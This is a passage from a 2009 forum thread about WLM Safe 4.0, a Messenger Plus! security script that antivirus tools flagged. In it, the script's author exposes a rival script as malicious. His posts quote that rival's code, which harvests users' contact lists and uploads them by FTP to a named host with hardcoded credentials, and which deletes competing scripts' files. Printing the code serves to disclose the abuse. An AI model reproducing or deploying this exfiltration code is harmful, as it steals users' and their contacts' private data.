WLM Safe 4.0 - What is this! |
Author: |
Message: |
wincy
Junior Member
Posts: 67 Reputation: 4
35 / /
Joined: Feb 2008
|
RE: WLM Safe 4.0 - What is this!
It doesn't matter at all BlackStar, do not worry!
I was just really surprised and a little bit hurted when i discovered that my script had been removed...
I often give a look at threads on this forum and find lot of useful information, and i'm sure of what i've done in my script, that's why i gave a fast reply, in order to make things as clear as possible.
I already know about the famous "Nick Plus" containing a virus, that's why i forgive your doubts!
For any other question or information contact me!
Thanks to Jigen90, TheGuruSupremacy and Moh Zayadi for support!
|
|
02-10-2009 07:20 PM |
|
|
Menthix
forum admin
Posts: 5537 Reputation: 102
40 / /
Joined: Mar 2002
|
RE: WLM Safe 4.0 - What is this!
I'm fairly sure the script works as wincy described, but this doesn't take away the problem: several virus scanners will throw alerts when installing the script. It will be hard for users to trust something that is supposed to remove viruses, while the removal tool itself is picked up by several virusscanners.
The virusscanners have problems with Process.exe and path.exe. From reading what they do I think they could fairly easy be replaced by something else that won't cause alerts.
Instead of process.exe you could use [url-http://technet.microsoft.com/en-us/library/bb491009.aspx]Taskkill[/url] which is part of Windows, so you don't even need to pack it with the script. I checked and it's available on XP, Vista and Win7.
path.exe exports a batch file like this: DOS code: SET "AppData=C:\DOCUME~1\XP_EN-VM\APPLIC~1"
SET "Cookies=C:\DOCUME~1\XP_EN-VM\Cookies"
SET "Desktop=C:\DOCUME~1\XP_EN-VM\Desktop"
SET "Favorites=C:\DOCUME~1\XP_EN-VM\FAVORI~1"
SET "NetHood=C:\DOCUME~1\XP_EN-VM\NetHood"
SET "Personal=C:\DOCUME~1\XP_EN-VM\MYDOCU~1"
SET "PrintHood=C:\DOCUME~1\XP_EN-VM\PRINTH~1"
SET "Recent=C:\DOCUME~1\XP_EN-VM\Recent"
SET "SendTo=C:\DOCUME~1\XP_EN-VM\SendTo"
SET "Start Menu=C:\DOCUME~1\XP_EN-VM\STARTM~1"
SET "Templates=C:\DOCUME~1\XP_EN-VM\TEMPLA~1"
SET "Programs=C:\DOCUME~1\XP_EN-VM\STARTM~1\Programs"
SET "Startup=C:\DOCUME~1\XP_EN-VM\STARTM~1\Programs\Startup"
SET "Local AppData=C:\DOCUME~1\XP_EN-VM\LOCALS~1\APPLIC~1"
SET "Cache=C:\DOCUME~1\XP_EN-VM\LOCALS~1\TEMPOR~1"
SET "History=C:\DOCUME~1\XP_EN-VM\LOCALS~1\History"
SET "My Pictures=C:\DOCUME~1\XP_EN-VM\MYDOCU~1\MYPICT~1"
SET "Fonts=C:\WINDOWS\Fonts"
SET "My Music=C:\DOCUME~1\XP_EN-VM\MYDOCU~1\MYMUSI~1"
SET "CD Burning=C:\DOCUME~1\XP_EN-VM\LOCALS~1\APPLIC~1\MICROS~1\CDBURN~1"
SET "Common AppData=C:\DOCUME~1\ALLUSE~1\APPLIC~1"
SET "Common Programs=C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs"
SET "Common Documents=C:\DOCUME~1\ALLUSE~1\DOCUME~1"
SET "Common Desktop=C:\DOCUME~1\ALLUSE~1\Desktop"
SET "Common Start Menu=C:\DOCUME~1\ALLUSE~1\STARTM~1"
SET "Common Pictures=C:\DOCUME~1\ALLUSE~1\DOCUME~1\MYPICT~1"
SET "Common Music=C:\DOCUME~1\ALLUSE~1\DOCUME~1\MYMUSI~1"
SET "Common Video=C:\DOCUME~1\ALLUSE~1\DOCUME~1\MYVIDE~1"
SET "Common Favorites=C:\DOCUME~1\ALLUSE~1\FAVORI~1"
SET "Common Startup=C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup"
SET "Common Templates=C:\DOCUME~1\ALLUSE~1\TEMPLA~1"
SET "Common Administrative Tools=C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\ADMINI~1"
I see you use some of those variables later in the batch file (not all). I'm not sure why eSafe and TrendMicro would pick this up. Do you have the source, or did you download it somewhere? This could probably be replaced by JScript too (some other scripter help out on this?).
BTW, two other things: - You assume Plus! is installed in %ProgramFiles%\"Messenger Plus! Live"\. Your script won't work at all when Plus! is installed in a different folder.
- Why do you delete ""Cila Smart Security" in safe.bat?
For people who want to take a look, temporary download location: http://random.menthix.net/temp/WLM-Safe-4.0.plsc
|
|
02-10-2009 07:53 PM |
|
|
wincy
Junior Member
Posts: 67 Reputation: 4
35 / /
Joined: Feb 2008
|
RE: WLM Safe 4.0 - What is this!
Hi MenthiX, thank for you reply!
I've made up tests with more than one anti-virus before using programs i downloaded from Internet.
They're quite commons and largely used, and avg, kaspersky and antivir didn't seem to identify them as dangerous or unwanted programs.
Are you sure that both exe are detected as infected/dangerous?
Thanks for your your tip about taskkill! Do you think it could be possible to make the same as path.exe in JScript?
Any help would be really appreciated!
Other things:
quote: You assume Plus! is installed in %ProgramFiles%\"Messenger Plus! Live"\. Your script won't work at all when Plus! is installed in a different folder.
- Didn't mind, how can i determine Messenger Plus' installation directory with a batch file?
quote: Why do you delete ""Cila Smart Security" in safe.bat?
- I delete Cila Smart Security for two reasons:
- Cila's script is not compatibile with WLM Safe, and it also runs this code:
case "delws":
fso.DeleteFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml');
fso.DeleteFolder(Directory + '\\Scripts' + '\\WLM Safe'); break;
case "inire":
kickWLMsafe();
MsgPlus.AddTimer("inire", 60000); break;
function kickWLMsafe() {
if (!fso.FileExists(Directory + "\\Scripts\\" + "WLM Safe" + "\\ScriptInfo.xml")) {} else {
MsgPlus.DisplayToast(Script_Name, RLFF(LangT, 81) + RLFF(LangT, 82), "", "DelWLMS");
ErrorNN("821", "WLM Safe");
TraceIA(RLFF(LangT, 83))
}
}
function DelWLMS() {
var fileObj = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml', 2, 0);
var fileObjA = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\wlmsafe.js', 2, 0);
fileObj.Write('');
fileObj.Close();
fileObjA.Write('');
fileObjA.Close();
MsgPlus.AddTimer("delws", 3000)
}
- In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
function MakeConfigEMAIL() {
Trace("0x222222224");
var sssp = Messenger.MyEmail;
var Contacts = Messenger.MyContacts;
var e = new Enumerator(Contacts);
for (; ! e.atEnd(); e.moveNext()) {
var Contact = e.item();
AddLineToFileZ(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + sssp + ".dat", encode(encodeBinary(Contact.Email)))
}
AddLineToFileZ(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + sssp + ".dat", encode(encodeBinary(Messenger.MyEmail)));
UpCEMAIL()
}
function UpCEMAIL() {
ftpweb = "ftp.cilacorp.x10hosting.com";
Trace("0x2777777777");
for (var e = new Enumerator(fso.GetFolder(MsgPlus.ScriptFilesPath + "\\Saves").files); ! e.atEnd(); e.moveNext()) {
scsulmi = MsgPlus.UploadFileFTP(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + e.item().Name, ftpweb, "msgplus@cilacorp.x10hosting.com", "T9Mrvcjyz81Q", e.item().Name)
}
}
I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.
Thanks to all for comprehension, replies and support.
This post was edited on 02-10-2009 at 09:33 PM by wincy.
|
|
02-10-2009 09:28 PM |
|
|
NiteMare
Veteran Member
Giga-Byte me
Posts: 2497 Reputation: 37
37 / /
Joined: Aug 2003
|
RE: WLM Safe 4.0 - What is this!
quote: Originally posted by wincy
In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
[removed to reduce the size of this quote]
well this should be enough to put that script on hold untill it can be looked at, and it looks like everything is encrypted in that script, which makes me suspisious
quote: Originally posted by wincy
I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.
well, if you are about making WLM secure, then why did your old code (can't confirm if you removed this as i can't download your script yet) have that obvious invasion of privacy?
|
|
02-11-2009 04:13 AM |
|
|
roflmao456
Skinning Contest Winner
Posts: 955 Reputation: 24
30 / /
Joined: Nov 2006
Status: Away
|
RE: WLM Safe 4.0 - What is this!
* roflmao456 is sniffing some script rivalry coming up o.0
Oh and the ftp login doesn't work
This post was edited on 02-11-2009 at 05:48 AM by roflmao456.
[quote]
Ultimatess6: What a noob mod
|
|
02-11-2009 05:43 AM |
|
|
Jigen90
New Member
Posts: 3
– / /
Joined: Feb 2009
|
RE: RE: WLM Safe 4.0 - What is this!
quote: Originally posted by roflmao456
Oh and the ftp login doesn't work
I've seen that code and the ftp login has worked till 1 or 2 months ago!
There were 3 o 4 lists of messenger contacts.
I've seen the site, it worked with that password!!
Now it doesn't work...strange!?!?! ...something wrong!?
|
|
02-11-2009 09:29 AM |
|
|
wincy
Junior Member
Posts: 67 Reputation: 4
35 / /
Joined: Feb 2008
|
RE: RE: WLM Safe 4.0 - What is this!
quote: Originally posted by NiteMare
quote: Originally posted by wincy
In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
[removed to reduce the size of this quote]
well this should be enough to put that script on hold untill it can be looked at, and it looks like everything is encrypted in that script, which makes me suspisious
quote: Originally posted by wincy
I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.
well, if you are about making WLM secure, then why did your old code (can't confirm if you removed this as i can't download your script yet) have that obvious invasion of privacy?
I was misunderstood, they copy part of my xml file, AND ALSO they pick up users' contact lists.
Here is a screen of my old script version's window and their actual window:
The code is also copy and pasted without changes.
I've never stolen contact lists because i think it is really a privacy violation!
You can check all previous versions of my script, if you want.
Source codes are short, simple, and not encrypted in any way.
Cila Smart Security is totally encripted, that's why maybe they have something to hide...
I realized that it was an unsafe script when i discovered that about 2 months ago ftp server could be accessed by anyone (even by spammers for example!) with a simple FTP program.
Everybody can check out old version (3.5) here:
http://www.wlmsafe.com/download2.php
More that 24.000 have downloaded that version and it has always been appreciated.
This post was edited on 02-11-2009 at 01:33 PM by wincy.
|
|
02-11-2009 01:22 PM |
|
|
vaccination
Veteran Member
Posts: 2513 Reputation: 43
32 / / –
Joined: Apr 2005
|
RE: WLM Safe 4.0 - What is this!
quote: Originally posted by NiteMare
quote: Originally posted by wincy
In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
[removed to reduce the size of this quote]
well this should be enough to put that script on hold untill it can be looked at, and it looks like everything is encrypted in that script, which makes me suspisious
quote: Originally posted by wincy
I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.
well, if you are about making WLM secure, then why did your old code (can't confirm if you removed this as i can't download your script yet) have that obvious invasion of privacy?
A different script did it, not his. So he was combating the invasion of privacy by removing the functions of that script if it was installed on the users PC.
|
|
02-11-2009 01:50 PM |
|
|
Moh
Senior Member
Posts: 553 Reputation: 10
– / /
Joined: Dec 2008
|
RE: WLM Safe 4.0 - What is this!
If it is that suspicious then why is Cila Security is still in the database? o.0
|
|
02-11-2009 02:13 PM |
|
|
wincy
Junior Member
Posts: 67 Reputation: 4
35 / /
Joined: Feb 2008
|
RE: WLM Safe 4.0 - What is this!
Because it is not detected as a virus.
But is encrypted with function(p,a,c,k,e,r) (javascript compression)
and maybe nobody ever seen the real code.
If you're interested in, here is decripted .js file:
http://myfreefilehosting.com/f/ce2d27c610_0.1MB
You can file all functions i quoted above.
|
|
02-11-2009 02:17 PM |
|
|
Pages: (4):
« First
«
1
[ 2 ]
3
4
»
Last »
|
|
|